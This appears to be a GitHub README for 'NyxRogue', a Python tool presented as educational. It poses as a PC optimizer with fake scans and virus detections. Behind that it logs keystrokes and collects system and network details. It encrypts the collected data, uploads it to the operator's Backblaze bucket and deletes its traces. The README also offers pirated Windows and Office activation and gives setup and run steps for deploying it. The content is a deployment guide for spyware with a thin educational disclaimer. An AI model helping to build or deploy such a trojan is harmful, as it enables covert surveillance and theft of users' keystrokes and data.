NyxRogue is an educational project developed by the Division of Cyber Anarchy (DCA). This software demonstrates how malicious actors can create seemingly helpful programs to infiltrate systems, collect data, and exploit vulnerabilities. The purpose of this project is to raise awareness and promote better cybersecurity practices.
This project is strictly intended for educational purposes and should only be used in controlled environments with explicit consent. Unauthorized use of this software for malicious purposes is illegal and punishable under applicable laws. By using this software, you agree to these terms and take full responsibility for your actions. The authors disclaim any responsibility for illegal misuse.
NyxRogue simulates the functionality of a system optimizer while covertly collecting data for analysis. Key features include:
-
System Information Collection
- Retrieves detailed hardware and software specifications.
- Detects potential vulnerabilities in the system.
-
Keystroke Logging
- Captures keyboard input for analysis, encrypted using the NyxCrypta library.
-
Fake Optimization
- Displays a simulated system and network optimization interface to deceive the user.
-
System Activation
- Through the optimization interface, users can activate Windows and Office using the publicly available scripts from massgrave.dev.
-
Data Encryption and Exfiltration
- Encrypts collected data with public-key cryptography before sending it to a Backblaze private bucket.
-
Trace Removal
- Deletes all traces of the program after execution, ensuring stealth.
NyxRogue is disguised as a PC optimizer with a user-friendly GUI. The interface displays:
- Fake scans for "temporary files" and "network performance."
- Simulated results, including fake virus detections and cache cleaning.
- A button to activate Windows and Office, leveraging community-contributed scripts.
While the program is running, it collects:
- System information (CPU, RAM, disk usage, etc.).
- Network details (public IP, active connections, etc.).
- Keystroke logs.
Collected data is:
- Encrypted using NyxCrypta.
- Uploaded securely to a private Backblaze bucket.
NyxRogue integrates scripts from massgrave.dev to activate Windows and Office directly from the optimizer interface.
- Acknowledgment: A huge thank you to the contributors of massgrave.dev for their work.
Upon termination, the program removes all local traces, leaving no evidence on the infected system.
-
Clone this repository:
git clone https://github.com/Division-of-Cyber-Anarchy/NyxRogue.git cd nyxrogue
-
Install the requirements
pip install -r requirements.txt
-
Configure the necessary variables
Before running NyxRogue, you need to configure the following variables:
- Encryption password:
- Line 34: Replace
bash password = "my_strong_password"
with a strong password of your choice. - This password will be used to generate encryption keys via NyxCrypta.
- Line 34: Replace
- Backblaze B2 Storage Details:
- Line 437: Replace
bash endpoint = "https://example.backblazeb2.com"
with the correct endpoint for your bucket. - Line 438: Enter your Backblaze
bash key_id in key_id = "your key_id"
. - Line 439: Add your application_key in
bash application_key = "your app_key"
.
- Line 437: Replace
- Bucket Name:
- Line 582: Change
bash bucket_name = "my-bucket-name"
to match the name of your Backblaze bucket.
- Line 582: Change
- Encryption password:
-
Run the script:
python NyxRogue.py
-
Stop the keylogger Close the optimizer window. Then successively press the "keystop" keys without the quotation marks. If the .nyx and .pem files do not appear in the project root, the keylogger is closed. If not, press the “keystop” key again.